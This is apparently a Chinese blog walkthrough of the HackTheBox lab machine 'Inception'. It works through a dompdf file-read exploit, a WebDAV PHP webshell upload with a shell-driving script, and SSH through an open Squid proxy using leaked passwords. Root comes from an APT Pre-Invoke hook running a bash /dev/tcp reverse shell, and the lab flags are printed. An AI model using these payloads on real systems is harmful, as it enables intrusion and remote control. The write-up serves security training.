[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升

2025-04-02 7 0

Information Gathering

IP Address Opening Ports
10.10.10.67 TCP:80,3128

$ ip='10.10.10.67'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Inception
3128/tcp open  http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved

DOM-PDF LFI

http://10.10.10.67/

[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图

http://10.10.10.67:3128/

[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图1

$ feroxbuster -u 'http://10.10.10.67/'

[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图2

http://10.10.10.67/dompdf/README.md

[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图3

http://10.10.10.67/dompdf/VERSION

[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图4

https://www.exploit-db.com/exploits/33004

$ curl 'http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd'

[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图5

$ curl -s 'http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/apache2/sites-enabled/000-default.conf' |grep -oE '[A-Za-z0-9+/=]{20,}' | tr -d '\n' | base64 -d

[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图6

$ curl -s 'http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/var/www/html/webdav_test_inception/webdav.passwd' |grep -oE '[A-Za-z0-9+/=]{20,}' | tr -d '\n' | base64 -d

[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图7

[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图8

username:webdav_tester
password:babygurl69

davtest && Webshell

Web 分布式创作和版本控制 (WebDAV) 是一种 HTTP 扩展,旨在允许人们使用 HTTP 创建和修改网站。它最初始于 1996 年。

[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图9

$ davtest -url http://10.10.10.67/webdav_test_inception -auth webdav_tester:babygurl69

[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图10

$ echo '<?php system($_GET[cmd]); ?>' > rev.php

$ curl -X PUT http://webdav_tester:babygurl69@10.10.10.67/webdav_test_inception/rev.php -d @rev.php

[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图11

#!/bin/bash

URL='http://webdav_tester:babygurl69@10.10.10.67/webdav_test_inception/rev.php?cmd='

while true; do
    read -p "webdav-shell> " cmd
    if [[ "$cmd" == "exit" ]]; then
        echo "[+] Exiting shell..."
        break
    fi
    encoded_cmd=$(echo -n "$cmd" | jq -sRr @uri)
    curl -s "${URL}${encoded_cmd}"
    echo
done

[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图12

www-data -> cobb : Squid Unauthorized access

webdav-shell> cat /var/www/html/wordpress_4.8.3/wp-config.php

[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图13

username:root
password:VwPddNh7xMZyDQoByQL4

[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图14

[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图15

$ proxychains -f ./proxychains.conf ssh cobb@127.0.0.1

[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图16

User.txt

a5b6db2fa5bfe8a677c41ec3b01b2ba6

Privilege Escalation:FTP + TFTP && Apt Pre-Invoke Script

[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图17

$ sudo su

$ proxychains -f ./proxychains.conf ssh -D 1080 cobb@127.0.0.1

$ proxychains -f ./proxychains1080.conf scp pspy64 cobb@127.0.0.1:/tmp/pspy64

$ proxychains -f ./proxychains1080.conf scp linpeas.sh cobb@127.0.0.1:/tmp/linpeas.sh

扫描C端

$ nc -uzv 192.168.0.1 1-65535 2>&1 | grep -v refused

Connection to 192.168.0.1 21 port [tcp/ftp] succeeded!
Connection to 192.168.0.1 22 port [tcp/ssh] succeeded!
Connection to 192.168.0.1 53 port [tcp/domain] succeeded!

$ ftp 192.168.0.1

在ftp内无法上传文件。通过读取宿主机的cron任务得知每五分钟会运行一次apt update命令

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 *   * * *   root    apt update 2>&1 >/var/log/apt/custom.log
30 23   * * *   root    apt upgrade -y 2>&1 >/dev/null

[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图18

$ tftp 192.168.0.1

tftp> put /tmp/exp /tmp/exp

可以通过tftp上传文件

[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图19

靶机宿主:

00exp内容

APT::Update::Pre-Invoke {"/bin/bash /tmp/rev.sh"}

/tmp/rev.sh

#!/bin/bash

bash -i >& /dev/tcp/192.168.0.10/9911 0>&1

$ tftp 192.168.0.1

tftp> put /tmp/00exp /etc/apt/apt.conf.d/00exp
tftp> put /tmp/rev.sh /tmp/rev.sh

$ nc -lvnp 9911

[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图20

靶机容器:

$ nc -lvnp 9911

[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图21

root.txt

d208effa777aa4489c26d2772723190c


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

二进制分析实战笔记(二)
[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升
【APP 逆向百例】淘某热点 APP 逆向分析
file协议小解——为什么是”file:///path”
HTB-writeup-writeup
HTB-Precious-WriteUp

发布评论